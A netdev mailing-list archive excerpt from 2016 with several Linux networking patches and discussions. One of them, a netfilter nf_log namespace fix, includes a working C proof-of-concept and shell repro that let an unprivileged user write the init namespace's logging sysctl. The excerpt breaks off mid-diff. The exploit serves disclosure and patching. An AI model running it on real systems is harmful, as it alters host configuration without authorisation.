> Fixes: a351a1b03bf1 ('net/mlx5: Introduce bulk reading of flow counters')
> Signed-off-by: Roi Dayan 
> Signed-off-by: Or Gerlitz 
> ---
>  drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> index 9134010..287ade1 100644
> --- a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> +++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>  {
>   struct mlx5_cmd_fc_bulk *b;
> - int outlen = sizeof(*b) +
> + int outlen =
>   MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>   MLX5_ST_SZ_BYTES(traffic_counter) * num;
>
> - b = kzalloc(outlen, GFP_KERNEL);
> + b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>   if (!b)
>   return NULL;
  ^ very controversial decision.
The code flow mlx5_fc_stats_query->mlx5_cmd_fc_bulk_alloc->kzalloc
failure is the same for success scenario too.

It is not related to the proposed patch.

>
> --
> 2.3.7
>



Re: [PATCH net-next 2/3] r8152: support ECM mode

2016-09-18 Thread kbuild test robot

Hi Hayes,

[auto build test ERROR on net-next/master]

url:
https://github.com/0day-ci/linux/commits/Hayes-Wang/r8152-configuration-setting/20160907-192351
config: i386-randconfig-x0-09182136 (attached as .config)
compiler: gcc-6 (Debian 6.2.0-3) 6.2.0 20160901
reproduce:
# save the attached .config to linux build tree
make ARCH=i386 

All errors (new ones prefixed by >>):

   drivers/built-in.o: In function `r815x_mdio_write':
>> r8152.c:(.text+0x19a664): undefined reference to `usbnet_write_cmd'
   drivers/built-in.o: In function `r815x_mdio_read':
>> r8152.c:(.text+0x19a6ae): undefined reference to `usbnet_read_cmd'
   drivers/built-in.o: In function `rtl_usbnet_disconnect':
>> r8152.c:(.text+0x19aaa9): undefined reference to `usbnet_disconnect'
   drivers/built-in.o: In function `rtl_ecm_bind':
>> r8152.c:(.text+0x19c143): undefined reference to `usbnet_cdc_bind'
   r8152.c:(.text+0x19c175): undefined reference to `usbnet_write_cmd'
>> r8152.c:(.text+0x19c1e8): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `rtl_usbnet_suspend':
>> r8152.c:(.text+0x19d3ab): undefined reference to `usbnet_suspend'
   drivers/built-in.o: In function `rtl_usbnet_probe':
>> r8152.c:(.text+0x19d7bd): undefined reference to `usbnet_probe'
   drivers/built-in.o: In function `rtl_usbnet_reset_resume':
>> r8152.c:(.text+0x19ec33): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `rtl_usbnet_resume':
   r8152.c:(.text+0x19ec68): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3538c): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3539c): undefined reference to `usbnet_manage_power'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x353a0): undefined reference to `usbnet_cdc_status'

---
0-DAY kernel test infrastructureOpen Source Technology Center
https://lists.01.org/pipermail/kbuild-all   Intel Corporation



[PATCH v2 net-next] MAINTAINERS: Add an entry for the core network DSA code

2016-09-18 Thread Andrew Lunn

The core distributed switch architecture code currently does not have
a MAINTAINERS entry, which results in some contributions not landing
in the right people's inboxes.

Signed-off-by: Andrew Lunn 
---
v2: Add include/net/dsa.h and drivers/net/dsa/

 MAINTAINERS | 9 +
 1 file changed, 9 insertions(+)

diff --git a/MAINTAINERS b/MAINTAINERS
index ce80b36aab69..8c8a2e40bdbb 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -8169,6 +8169,15 @@ S:   Maintained
 W: https://fedorahosted.org/dropwatch/
 F: net/core/drop_monitor.c
 
+NETWORKING [DSA]
+M: Andrew Lunn 
+M: Vivien Didelot 
+M: Florian Fainelli 
+S: Maintained
+F: net/dsa/
+F: include/net/dsa.h
+F: drivers/net/dsa/
+
 NETWORKING [GENERAL]
 M: "David S. Miller" 
 L: netdev@vger.kernel.org
-- 
2.9.3

skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected

2016-09-18 Thread Al Viro

FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
might come from compound pages and I'm not entirely convinced that we won't
end up with coalesced fragments putting more than PAGE_SIZE into a single
pipe_buffer.  And that could badly confuse a bunch of code.

Can that legitimately happen?  If so, we'll need to audit quite a few
->splice_write()-related codepaths; FUSE, in particular, is very likely
to be unhappy with that kind of stuff, and it's not the only place where
we might count upon never seeing e.g. longer than PAGE_SIZE chunks in
bio_vec.  It shouldn't be all that hard to fix, but if the whole thing
is simply impossible, I would rather avoid that round of RTFS at the moment...

Comments?

Re: [PATCH net-next 2/2] net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

2016-09-18 Thread Jamal Hadi Salim


On 16-09-18 10:33 AM, Shmulik Ladkani wrote:

TCA_VLAN_ACT_MODIFY allows one to change an existing tag.

It accepts same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
priority).
If packet is vlan tagged, then the tag gets overwritten according to
user specified attributes.

For example, this allows user to replace a tag's vid while preserving
its priority bits (as opposed to "action vlan pop pipe action vlan push").

Signed-off-by: Shmulik Ladkani 
---
 include/uapi/linux/tc_act/tc_vlan.h |  1 +
 net/sched/act_vlan.c| 29 -
 2 files changed, 29 insertions(+), 1 deletion(-)

diff --git a/include/uapi/linux/tc_act/tc_vlan.h b/include/uapi/linux/tc_act/tc_vlan.h
index be72b6e384..bddb272b84 100644
--- a/include/uapi/linux/tc_act/tc_vlan.h
+++ b/include/uapi/linux/tc_act/tc_vlan.h
@@ -16,6 +16,7 @@

 #define TCA_VLAN_ACT_POP   1
 #define TCA_VLAN_ACT_PUSH  2
+#define TCA_VLAN_ACT_MODIFY3

 struct tc_vlan {
tc_gen;
diff --git a/net/sched/act_vlan.c b/net/sched/act_vlan.c
index 59a8d3150a..e5eeaa7a01 100644
--- a/net/sched/act_vlan.c
+++ b/net/sched/act_vlan.c
@@ -30,6 +30,7 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
struct tcf_vlan *v = to_vlan(a);
int action;
int err;
+   u16 tci;

spin_lock(&v->tcf_lock);
tcf_lastuse_update(&v->tcf_tm);
@@ -48,6 +49,30 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
if (err)
goto drop;
break;
+   case TCA_VLAN_ACT_MODIFY:
+   if (!skb_vlan_tagged(skb))
+   goto unlock;
+   /* extract existing tag (and guarantee no hwaccel tag) */
+   if (skb_vlan_tag_present(skb)) {
+   tci = skb_vlan_tag_get(skb);
+   skb->vlan_tci = 0;
+   } else {
+   if (skb->mac_len < VLAN_ETH_HLEN)
+   goto unlock;
+   err = __skb_vlan_pop(skb, &tci);
+   if (err)
+   goto drop;
+   }
+   /* replace the vid */
+   tci = (tci & ~VLAN_VID_MASK) | v->tcfv_push_vid;
+   /* replace prio bits, if tcfv_push_prio specified */
+   if (v->tcfv_push_prio) {
+   tci &= ~VLAN_PRIO_MASK;
+   tci |= v->tcfv_push_prio << VLAN_PRIO_SHIFT;
+   }
+   /* put updated tci as hwaccel tag */
+   __vlan_hwaccel_put_tag(skb, v->tcfv_push_proto, tci);
+   break;
default:
BUG();
}
@@ -102,6 +127,7 @@ static int tcf_vlan_init(struct net *net, struct nlattr *nla,
case TCA_VLAN_ACT_POP:
break;
case TCA_VLAN_ACT_PUSH:
+   case TCA_VLAN_ACT_MODIFY:
if (!tb[TCA_VLAN_PUSH_VLAN_ID]) {
if (exists)
tcf_hash_release(*a, bind);
@@ -185,7 +211,8 @@ static int tcf_vlan_dump(struct sk_buff *skb, struct tc_action *a,
if (nla_put(skb, TCA_VLAN_PARMS, sizeof(opt), &opt))
goto nla_put_failure;

-   if (v->tcfv_action == TCA_VLAN_ACT_PUSH &&
+   if ((v->tcfv_action == TCA_VLAN_ACT_PUSH ||
+v->tcfv_action == TCA_VLAN_ACT_MODIFY) &&
(nla_put_u16(skb, TCA_VLAN_PUSH_VLAN_ID, v->tcfv_push_vid) ||
 nla_put_be16(skb, TCA_VLAN_PUSH_VLAN_PROTOCOL,
  v->tcfv_push_proto) ||




Nice. If you didn't do it I would have ;->

Acked-by: Jamal Hadi Salim 

cheers,
jamal
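
The TCI arithmetic in the MODIFY case (replace the VID, keep the priority bits unless a new priority is given) can be tried outside the kernel. This is a sketch, not the patch's code: the DEMO_ constants copy the usual 802.1Q layout (12-bit VID, 3-bit priority at bit 13), and demo_vlan_modify_tci() takes an explicit set_prio flag, which is an assumption of this example. The patch itself tests tcfv_push_prio for non-zero instead.

```c
#include <stdint.h>

#define DEMO_VLAN_VID_MASK   0x0fffu
#define DEMO_VLAN_PRIO_MASK  0xe000u
#define DEMO_VLAN_PRIO_SHIFT 13

/*
 * Returns tci with its VID replaced by vid. The priority bits are kept
 * unless set_prio is non-zero, in which case they are replaced by prio.
 */
uint16_t demo_vlan_modify_tci(uint16_t tci, uint16_t vid,
			      int set_prio, uint8_t prio)
{
	uint16_t out;

	/* Keep everything except the old VID, then OR in the new one. */
	out = (uint16_t)((tci & ~DEMO_VLAN_VID_MASK) |
			 (vid & DEMO_VLAN_VID_MASK));

	if (set_prio) {
		out = (uint16_t)(out & ~DEMO_VLAN_PRIO_MASK);
		out = (uint16_t)(out | ((prio & 0x7u) << DEMO_VLAN_PRIO_SHIFT));
	}
	return out;
}
```

For a tag with priority 5 and VID 100 (TCI 0xA064), changing only the VID to 200 gives 0xA0C8, so the priority survives. A pop followed by a push would rebuild the tag from the push parameters alone.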

[PATCH] netfilter: fix namespace handling in nf_log_proc_dostring

2016-09-18 Thread Jann Horn

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
  int fd = open(path, O_WRONLY);
  if (fd == -1)
    err(1, "unable to open thing");
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "unable to write thing");
  close(fd);
}

int child_fn(void *p_) {
  if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
            NULL))
    err(1, "mount");

  /* Yes, we need to set the maps for the net sysctls to recognize us
   * as namespace root.
   */
  char buf[1000];
  sprintf(buf, "0 %d 1\n", (int)outer_uid);
  writefile("/proc/1/uid_map", buf);
  writefile("/proc/1/setgroups", "deny");
  sprintf(buf, "0 %d 1\n", (int)outer_gid);
  writefile("/proc/1/gid_map", buf);

  stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
  if (stolen_fd == -1)
    err(1, "open nf_log");
  return 0;
}

int main(void) {
  outer_uid = getuid();
  outer_gid = getgid();

  int child = clone(child_fn, child_stack + sizeof(child_stack),
                    CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                    |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
  if (child == -1)
    err(1, "clone");
  int status;
  if (wait(&status) != child)
    err(1, "wait");
  if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
    errx(1, "child exit status bad");

  char *data = "NONE";
  if (write(stolen_fd, data, strlen(data)) != strlen(data))
    err(1, "write");
  return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn 
---
 net/netfilter/nf_log.c | 6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..1df2c8d 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, int write,
char buf[NFLOGGER_NAME_LEN];
int r = 0;
int tindex = (unsigned long)table->extra1;
-   struct net *net = current->nsproxy->net_ns;
+   struct net *net = table->extra2;
 
if (write) {
struct ctl_table tmp = *table;
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
-   nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(struct net *net)
}
}
 
+   for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+   table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
-- 
2.1.4
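
The idea of the fix (the handler takes its namespace from the table entry it was registered with, not from whoever happens to call it) can be modelled in userspace. This is a sketch under assumptions: struct demo_net, struct demo_ctl, demo_register() and demo_write() are hypothetical names, and only the extra2 field name is borrowed from the patch.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define DEMO_NAME_LEN 16

/* Stand-in for a network namespace holding one logger name. */
struct demo_net {
	char logger[DEMO_NAME_LEN];
};

/* Stand-in for a sysctl table entry. */
struct demo_ctl {
	void *extra2;	/* namespace stashed at registration time */
};

/* Binds a table entry to the namespace it belongs to. */
void demo_register(struct demo_ctl *t, struct demo_net *net)
{
	t->extra2 = net;
}

/*
 * Writes val into the namespace bound to the entry. caller_net models
 * "current's" namespace and is ignored on purpose.
 */
int demo_write(const struct demo_ctl *t, const struct demo_net *caller_net,
	       const char *val)
{
	struct demo_net *net = t->extra2;

	(void)caller_net;
	assert(net != NULL);
	if (strlen(val) >= DEMO_NAME_LEN)
		return -1;
	strcpy(net->logger, val);
	return 0;
}
```

With this shape, a file descriptor opened in a child namespace and later written from the init namespace still changes only the child's setting, which is the behaviour the repro above is meant to check for.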

Re: [iproute PATCH] tc: don't accept qdisc 'handle' greater than ffff

2016-09-18 Thread Phil Sutter

On Fri, Sep 16, 2016 at 10:30:00AM +0200, Davide Caratti wrote:
> since get_qdisc_handle() truncates the input value to 16 bit, return an
> error and prompt "invalid qdisc ID" in case input 'handle' parameter needs
> more than 16 bit to be stored.
> 
> Signed-off-by: Davide Caratti 

Acked-by: Phil Sutter
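
The range check being acked here amounts to refusing a major number that does not fit in 16 bits before it is shifted into place. A minimal sketch, assuming a hypothetical helper demo_parse_qdisc_major() and not reproducing the actual get_qdisc_handle() from iproute2:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/*
 * Parses a hex qdisc major such as "1:" or "ffff". On success stores the
 * value in the upper 16 bits of *handle and returns 0; returns -1 for
 * input that is empty, out of range, or followed by garbage.
 */
int demo_parse_qdisc_major(const char *str, uint32_t *handle)
{
	char *end;
	unsigned long maj;

	assert(str != NULL && handle != NULL);
	maj = strtoul(str, &end, 16);
	if (end == str)
		return -1;	/* no hex digits at all */
	if (maj > 0xfffful)
		return -1;	/* would otherwise be silently truncated */
	if (*end != ':' && *end != '\0')
		return -1;	/* trailing garbage */
	*handle = (uint32_t)maj << 16;
	return 0;
}
```

Checking the range on the unsigned long before the cast is what keeps "10000:" from quietly turning into handle 0.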

Re: [patch net-next RFC 0/2] fib4 offload: notifier to let hw to be aware of all prefixes

2016-09-18 Thread Florian Fainelli

On 06/09/2016 at 05:01, Jiri Pirko wrote:
> From: Jiri Pirko 
> 
> This is an RFC, unfinished. I came across some issues in the process, so I
> would like to share those and restart the fib offload discussion in order to
> make it really usable.
> 
> So the goal of this patchset is to allow the driver to propagate all prefixes
> configured in the kernel down to HW. This is necessary for routing to work
> as expected. If we don't do that, HW might forward prefixes known to the kernel
> incorrectly. Take an example where a default route is set in switch HW and there
> is an IP address set on a management (non-switch) port.
> 
> Currently, only fibs related to the switch port netdev are offloaded using
> switchdev ops. This model is not extendable, so the first patch introduces
> a replacement: a notifier to propagate fib additions and removals to whoever
> is interested. The second patch makes mlxsw adopt this new way, registering
> one notifier block for each mlxsw (asic) instance.

Instead of introducing another specialization of a notifier_block
implementation, could we somehow have a kernel-based netlink listener
which receives the same kind of event information from rtmsg_fib()?

The reason is that having such a facility would hook directly onto
existing rtmsg_* calls that exist throughout the stack, and that seems
to scale better.
-- 
Florian

Re: skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected

2016-09-18 Thread Linus Torvalds

On Sun, Sep 18, 2016 at 12:31 PM, Al Viro  wrote:
> FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
> might come from compound pages and I'm not entirely convinced that we won't
> end up with coalesced fragments putting more than PAGE_SIZE into a single
> pipe_buffer.  And that could badly confuse a bunch of code.

The pipe buffer code is actually *supposed* to handle any size
allocations at all. They should *not* be limited by pages, exactly
because the data can come from huge-pages or just multi-page
allocations. It's definitely possible with networking, and networking
is one of the *primary* targets of splice in many ways.

So if the splice code ends up being confused by "this is not just
inside a single page", then the splice code is buggy, I think.

Why would splice_write() cases be confused anyway? A filesystem needs
to be able to handle the case of "this needs to be split" regardless,
since even if the source buffer were to fit in a page, the offset
might obviously mean that the target won't fit in a page.

Now, if you decide that you want to make the iterator always split
those possibly big cases and never have big iovec entries, I guess
that would potentially be ok. But my initial reaction is that they are
perfectly normal and should be handled normally, and any code that
depends on a splice buffer fitting in one page is just buggy and
should be fixed.

 Linus
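
The "this needs to be split" case mentioned above, where a chunk is cut into pieces that each stay within one page, comes down to a short loop. This is a userspace sketch only: DEMO_PAGE_SIZE, struct demo_seg and demo_split_by_page() are hypothetical and are not taken from the pipe, splice or iov_iter code.

```c
#include <assert.h>
#include <stddef.h>

#define DEMO_PAGE_SIZE 4096u

struct demo_seg {
	size_t offset;	/* byte offset from the start of the first page */
	size_t len;	/* bytes in this segment; never crosses a page boundary */
};

/*
 * Splits [offset, offset + len) into segments that each stay inside one
 * page. Stores at most max segments in out and returns how many segments
 * the whole range needs.
 */
size_t demo_split_by_page(size_t offset, size_t len,
			  struct demo_seg *out, size_t max)
{
	size_t n = 0;

	while (len > 0) {
		size_t room = DEMO_PAGE_SIZE - (offset % DEMO_PAGE_SIZE);
		size_t take = len < room ? len : room;

		if (n < max) {
			assert(out != NULL);
			out[n].offset = offset;
			out[n].len = take;
		}
		n++;
		offset += take;
		len -= take;
	}
	return n;
}
```

A 4096-byte chunk that starts at offset 100 already needs two segments (3996 + 100 bytes), which illustrates why a consumer cannot assume one page per buffer even when the length itself fits in a page.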

Re: [PATCH RFC 04/11] net/mlx5e: Build RX SKB on demand

2016-09-18 Thread Tariq Toukan


Hi Alexei,

On 07/09/2016 8:34 PM, Alexei Starovoitov wrote:

On Wed, Sep 07, 2016 at 03:42:25PM +0300, Saeed Mahameed wrote:

For non-striding RQ configuration before this patch we had a ring
with pre-allocated SKBs and mapped the SKB->data buffers for
device.

For robustness and better RX data buffers management, we allocate a
page per packet and build_skb around it.

This patch (which is a prerequisite for XDP) will actually reduce
performance for normal stack usage, because we are now hitting a bottleneck
in the page allocator. A later patch of page reuse mechanism will be
needed to restore or even improve performance in comparison to the old
RX scheme.

Packet rate performance testing was done with pktgen 64B packets on xmit
side and TC drop action on RX side.

CPU: Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz

Comparison is done between:
  1. Baseline, before 'net/mlx5e: Build RX SKB on demand'
  2. Build SKB with RX page cache (This patch)

Streams    Baseline    Build SKB+page-cache    Improvement
-----------------------------------------------------------
1          4.33Mpps    5.51Mpps                27%
2          7.35Mpps    11.5Mpps                52%
4          14.0Mpps    16.3Mpps                16%
8          22.2Mpps    29.6Mpps                20%
16         24.8Mpps    34.0Mpps                17%

Impressive gains for build_skb. I think it should help ip forwarding too
and likely tcp_rr. tcp_stream shouldn't see any difference.
If you can benchmark that along with pktgen+tc_drop it would
help to better understand the impact of the changes.

Why do you expect an improvement in tcp_rr?
I don't see such in my tests.

Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation

2016-09-18 Thread Or Gerlitz

On Sun, Sep 18, 2016 at 9:02 PM, Leon Romanovsky  wrote:
> On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
>> From: Roi Dayan 

>> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>>  {
>>   struct mlx5_cmd_fc_bulk *b;
>> - int outlen = sizeof(*b) +
>> + int outlen =
>>   MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>>   MLX5_ST_SZ_BYTES(traffic_counter) * num;
>>
>> - b = kzalloc(outlen, GFP_KERNEL);
>> + b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>>   if (!b)
>>   return NULL;

>   ^ very controversial decision.
> The code flow mlx5_fc_stats_query->mlx5_cmd_fc_bulk_alloc->kzalloc
> failure is the same for success scenario too.

Sure, we will look into your comment and if needed come up with a
cleanup patch for net-next (4.9)

> It is not related to the proposed patch.

Correct, the proposed patch fixes a memory corruption that we want to
sort out for net (4.8)

Or.
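
The sizing rule the patch restores (allocate bookkeeping struct plus reply buffer, but tell the device only the reply buffer length) can be sketched with a flexible array member. The names and sizes below are assumptions for illustration: struct demo_bulk and the two DEMO_ sizes are made up and do not reflect the real mlx5 layouts.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define DEMO_REPLY_HDR  16u	/* made-up reply header size */
#define DEMO_COUNTER_SZ 16u	/* made-up per-counter size */

struct demo_bulk {
	unsigned short id;
	int num;
	size_t outlen;		/* length of out[] only, as given to the device */
	unsigned char out[];	/* the device reply lands here */
};

/* Allocates bookkeeping plus reply space; outlen covers only the reply. */
struct demo_bulk *demo_bulk_alloc(unsigned short id, int num)
{
	size_t outlen;
	struct demo_bulk *b;

	assert(num >= 0);
	outlen = DEMO_REPLY_HDR + DEMO_COUNTER_SZ * (size_t)num;

	/* The allocation covers the struct and the reply buffer... */
	b = calloc(1, sizeof(*b) + outlen);
	if (!b)
		return NULL;

	b->id = id;
	b->num = num;
	/* ...but the recorded output length must not include sizeof(*b). */
	b->outlen = outlen;
	return b;
}
```

If outlen also counted sizeof(*b), a later copy of outlen bytes into out[] would run past the end of the allocation by exactly that amount.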

Re: [PATCH] net: skbuff: Fix length validation in skb_vlan_pop()

2016-09-18 Thread pravin shelar

On Sun, Sep 18, 2016 at 3:09 AM, Shmulik Ladkani
 wrote:
> In 93515d53b1
>   "net: move vlan pop/push functions into common code"
> skb_vlan_pop was moved from its private location in openvswitch to
> skbuff common code.
>
> In case !vlan_tx_tag_present, the original 'pop_vlan()' assured
> that skb->len is sufficient for the existence of a vlan_ethhdr
> (if skb->len < VLAN_ETH_HLEN then pop was a no-op).
>
> This validation was moved as is into the new common 'skb_vlan_pop'.
>
> Alas, in its original location (openvswitch), there's a guarantee that
> 'data' points to the mac_header, therefore the 'skb->len < VLAN_ETH_HLEN'
> condition made sense.
> However there's no such guarantee in the generic 'skb_vlan_pop'.
>
> For short packets received in rx path going through 'skb_vlan_pop',
> this causes 'skb_vlan_pop' to fail pop-ing a valid vlan hdr (in case tag
> is in payload), or to fail moving next tag into hw-accel tag.
>
> Instead, verify that 'skb->mac_len' is sufficient.
>
> Signed-off-by: Shmulik Ladkani 
> ---
>  Spotted by code review while doing work augmenting tc act vlan.
>
>  net/core/skbuff.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/net/core/skbuff.c b/net/core/skbuff.c
> index 1e329d4112..cc2c004838 100644
> --- a/net/core/skbuff.c
> +++ b/net/core/skbuff.c
> @@ -4537,7 +4537,7 @@ int skb_vlan_pop(struct sk_buff *skb)
> } else {
> if (unlikely((skb->protocol != htons(ETH_P_8021Q) &&
>   skb->protocol != htons(ETH_P_8021AD)) ||
> -skb->len < VLAN_ETH_HLEN))
> +skb->mac_len < VLAN_ETH_HLEN))

There is already check in __skb_vlan_pop() to validate skb for a vlan
header. So it is safe to drop this check entirely.

Re: [PATCH] net: hns: add function declarations in hns_dsaf_mac.h

2016-09-18 Thread Arnd Bergmann

On Sunday, September 18, 2016 5:11:36 PM CEST Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:246:6: warning: no previous prototype for 'hns_dsaf_srst_chns' [-Wmissing-prototypes]
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:276:6: warning: no previous prototype for 'hns_dsaf_roce_srst' [-Wmissing-prototypes]
> 
> In fact, these two functions are not declared in any file, but should
> be declared in a header file so that other files can see them.
> 
> So this patch adds the declarations into
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
> 
> Signed-off-by: Baoyou Xie 
> 

Why can't these be declared static?

Arnd
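
The two ways of silencing -Wmissing-prototypes look like this in a small example. The function names are hypothetical and unrelated to the hns driver; the sketch only shows that a file-local helper can be static, while a function called from other files needs a visible prototype (normally placed in a header).

```c
/* Would live in a header if other files call this function. */
int demo_reset_channels(int port);

/*
 * Used only in this file: static gives it internal linkage, so no
 * prototype is needed and -Wmissing-prototypes does not fire.
 */
static int demo_reset_one(int port)
{
	return port >= 0 ? 0 : -1;
}

/* Externally visible; matches the prototype declared above. */
int demo_reset_channels(int port)
{
	return demo_reset_one(port);
}
```

Making a function static is the smaller change whenever nothing outside the file calls it, and it also lets the compiler warn if the function later becomes unused.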

[PATCH] net: explicitly whitelist sysctls for unpriv namespaces

2016-09-18 Thread Jann Horn

There were two net sysctls that could be written from unprivileged net
namespaces, but weren't actually namespaced.

To fix the existing issues and prevent this kind of thing from happening again in
the future, explicitly whitelist permitted sysctls.

Note: The current whitelist is "allow everything that was previously
accessible and that doesn't obviously modify global state".

On my system, this patch just removes the write permissions for
ipv4/netfilter/ip_conntrack_max, which would have been usable for a local
DoS. With a different config, the ipv4/vs/debug_level sysctl would also be
affected.

Maximum impact of this seems to be local DoS, and it's a fairly large
commit, so I'm sending this publicly directly.

An alternative (and much smaller) fix would be to just change the
permissions of the two files in question to be 0444 in non-privileged
namespaces, but I believe that this solution is slightly less error-prone.
If you think I should switch to the simple fix, let me know.
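
One way such a whitelist could be enforced is to strip the write bits from any entry that is not marked as namespaced when the table is seen from an unprivileged namespace. This is a sketch and an assumption: the enforcement code in net/sysctl_net.c is not shown in this excerpt, and struct demo_entry and demo_effective_mode() are hypothetical names. Only the `namespaced` flag comes from the patch.

```c
#include <stdbool.h>

struct demo_entry {
	unsigned int mode;	/* e.g. 0644 */
	bool namespaced;	/* safe to write from an unprivileged netns? */
};

/*
 * Returns the mode to expose: unchanged for a privileged namespace or a
 * whitelisted entry, otherwise with all write bits cleared.
 */
unsigned int demo_effective_mode(const struct demo_entry *e,
				 bool privileged_ns)
{
	if (privileged_ns || e->namespaced)
		return e->mode;
	return e->mode & ~0222u;
}
```

The default in this sketch is deny: an entry nobody thought about stays read-only in unprivileged namespaces, which is the error-proneness argument made above.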

Signed-off-by: Jann Horn 
---
 include/linux/sysctl.h |  1 +
 net/ax25/sysctl_net_ax25.c |  4 +++-
 net/ieee802154/6lowpan/reassembly.c|  7 +--
 net/ipv4/devinet.c |  2 ++
 net/ipv4/ip_fragment.c | 10 ++---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c |  3 +++
 net/ipv4/netfilter/nf_conntrack_proto_icmp.c   |  2 ++
 net/ipv4/sysctl_net_ipv4.c |  4 +++-
 net/ipv4/xfrm4_policy.c|  1 +
 net/ipv6/addrconf.c|  1 +
 net/ipv6/icmp.c|  1 +
 net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c |  1 +
 net/ipv6/netfilter/nf_conntrack_reasm.c|  7 +--
 net/ipv6/sysctl_net_ipv6.c | 23 ++---
 net/ipv6/xfrm6_policy.c|  1 +
 net/mpls/af_mpls.c |  2 ++
 net/netfilter/ipvs/ip_vs_ctl.c | 26 
 net/netfilter/nf_conntrack_proto_generic.c |  2 ++
 net/netfilter/nf_conntrack_proto_sctp.c| 16 +++
 net/netfilter/nf_conntrack_proto_tcp.c | 26 
 net/netfilter/nf_conntrack_proto_udp.c |  4 
 net/netfilter/nf_conntrack_proto_udplite.c |  2 ++
 net/netfilter/nf_log.c |  1 +
 net/rds/tcp.c  |  2 ++
 net/sctp/sysctl.c  |  4 +++-
 net/sysctl_net.c   | 28 +-
 26 files changed, 154 insertions(+), 27 deletions(-)

diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
index a4f7203..c47c52d 100644
--- a/include/linux/sysctl.h
+++ b/include/linux/sysctl.h
@@ -116,6 +116,7 @@ struct ctl_table
struct ctl_table_poll *poll;
void *extra1;
void *extra2;
+   bool namespaced;/* allow writes in unpriv netns? */
 };
 
 struct ctl_node {
diff --git a/net/ax25/sysctl_net_ax25.c b/net/ax25/sysctl_net_ax25.c
index 919a5ce..8e6ab36 100644
